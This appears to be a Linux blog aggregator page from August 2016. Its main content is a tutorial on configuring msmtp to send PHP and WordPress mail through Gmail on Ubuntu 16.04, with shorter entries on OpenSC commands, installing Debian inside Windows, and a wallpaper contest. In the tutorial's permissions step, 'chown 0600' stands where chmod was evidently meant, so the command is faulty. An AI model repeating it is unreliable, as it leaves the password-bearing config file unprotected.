certutil -L -h "OpenSC" -d sql:$HOME/.pki/nssdb

If this winds up causing issues, you can remove it using the following command:

modutil -delete "OpenSC" -dbdir sql:$HOME/.pki/nssdb
on August 08, 2016 12:17 AM

August 07, 2016

A few years ago, I remember that Ubuntu had a trick that allowed the distribution to be installed as one large file within a Windows partition. Does the same thing exist to install Debian?
on August 07, 2016 05:18 PM

I previously wrote an article around configuring msmtp on Ubuntu 12.04, but as I hinted at in my previous post that sort of got lost when the upgrade of my host to Ubuntu 16.04 went somewhat awry. What follows is essentially the same post, with some slight updates for 16.04. As before, this assumes that you’re using Apache as the web server, but I’m sure it shouldn’t be too different if your web server of choice is something else.

I use msmtp for sending emails from this blog to notify me of comments and upgrades etc. Here I’m going to document how I configured it to send emails via a Google Apps account, although this should also work with a standard Gmail account too.

To begin, we need to install 3 packages:
sudo apt-get install msmtp msmtp-mt ca-certificates
Once these are installed, a default config is required. By default msmtp will look at /etc/msmtprc, so I created that using vim, though any text editor will do the trick. This file looked something like this:

# Set defaults.
defaults
# Enable or disable TLS/SSL encryption.
tls on
tls_starttls on
tls_trust_file /etc/ssl/certs/ca-certificates.crt
# Setup WP account's settings.
account <MSMTP_ACCOUNT_NAME>
host smtp.gmail.com
port 587
auth login
user <EMAIL_USERNAME>
password <PASSWORD>
from <FROM_ADDRESS>
logfile /var/log/msmtp/msmtp.log

account default : <MSMTP_ACCOUNT_NAME>

Any of the uppercase items (i.e. <PASSWORD>) are things that need replacing specific to your configuration. The exception to that is the log file, which can of course be placed wherever you wish to log any msmtp activity/warnings/errors to.

Once that file is saved, we’ll update the permissions on the above configuration file — msmtp won’t run if the permissions on that file are too open — and create the directory for the log file.

sudo mkdir /var/log/msmtp
sudo chown -R www-data:adm /var/log/msmtp
sudo chown 0600 /etc/msmtprc

Next I chose to configure logrotate for the msmtp logs, to make sure that the log files don’t get too large as well as keeping the log directory a little tidier. To do this, we create /etc/logrotate.d/msmtp and configure it with the following file. Note that this is optional, you may choose to not do this, or you may choose to configure the logs differently.

/var/log/msmtp/*.log {
rotate 12
monthly
compress
missingok
notifempty
}

Now that the logging is configured, we need to tell PHP to use msmtp by editing /etc/php/7.0/apache2/php.ini and updating the sendmail path from
sendmail_path =
to
sendmail_path = "/usr/bin/msmtp -C /etc/msmtprc -a <MSMTP_ACCOUNT_NAME> -t"
Here I did run into an issue where even though I specified the account name it wasn’t sending emails correctly when I tested it. This is why the line account default : <MSMTP_ACCOUNT_NAME> was placed at the end of the msmtp configuration file. To test the configuration, ensure that the PHP file has been saved and run sudo service apache2 restart, then run php -a and execute the following

mail ('personal@email.com', 'Test Subject', 'Test body text');
exit();

Any errors that occur at this point will be displayed in the output so should make diagnosing any errors after the test relatively easy. If all is successful, you should now be able to use PHPs sendmail (which at the very least WordPress uses) to send emails from your Ubuntu server using Gmail (or Google Apps).

I make no claims that this is the most secure configuration, so if you come across this and realise it’s grossly insecure or something is drastically wrong please let me know and I’ll update it accordingly.

on August 07, 2016 03:56 PM

August 06, 2016

budgie-remix 16.10 Yakkety Yak Wallpaper contest We invite everyone to contribute – even if you are not currently a budgie-remix user For guidelines, rules & submissions : Official Flickr group https://www.flickr.com/groups/budgie-remix-16-10/  
on August 06, 2016 02:59 PM